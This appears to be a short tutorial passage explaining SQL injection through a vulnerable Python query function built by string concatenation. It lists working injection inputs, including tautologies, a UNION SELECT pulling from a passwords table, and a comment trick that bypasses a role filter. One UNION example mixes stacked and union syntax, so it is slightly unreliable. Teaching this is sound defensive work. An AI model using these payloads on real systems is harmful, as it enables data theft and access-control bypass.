The following code is vulnerable to SQL Injection, if the input is unfiltered.
def get_userdata(self, id):
cursor = db.cursor()
cursor.execute('SELECT * FROM users WHERE id = '+ id)
return cursor.fetchall()
To return all the records, the attacker could trigger a call with
id = "1 OR 1=1"
It is also possible to execute multiple queries with
id = "1 OR 1; union select * from passwords"
The latter may not work when tables have different columns, but it can be fixed easily to align the them. In this example the table passwords has two columns less than users:
id = "1 OR 1; union select *,NULL,NULL from passwords"
Imagine now the following query:
SELECT * FROM users WHERE id = ' + id + ' and role = 'student'
It can be attacked with:
id = "1 OR 1=1;--"
resulting in
SELECT * FROM users WHERE id = 1 OR 1=1;-- and role = 'student'
and therefore returning all values of users, regardless the role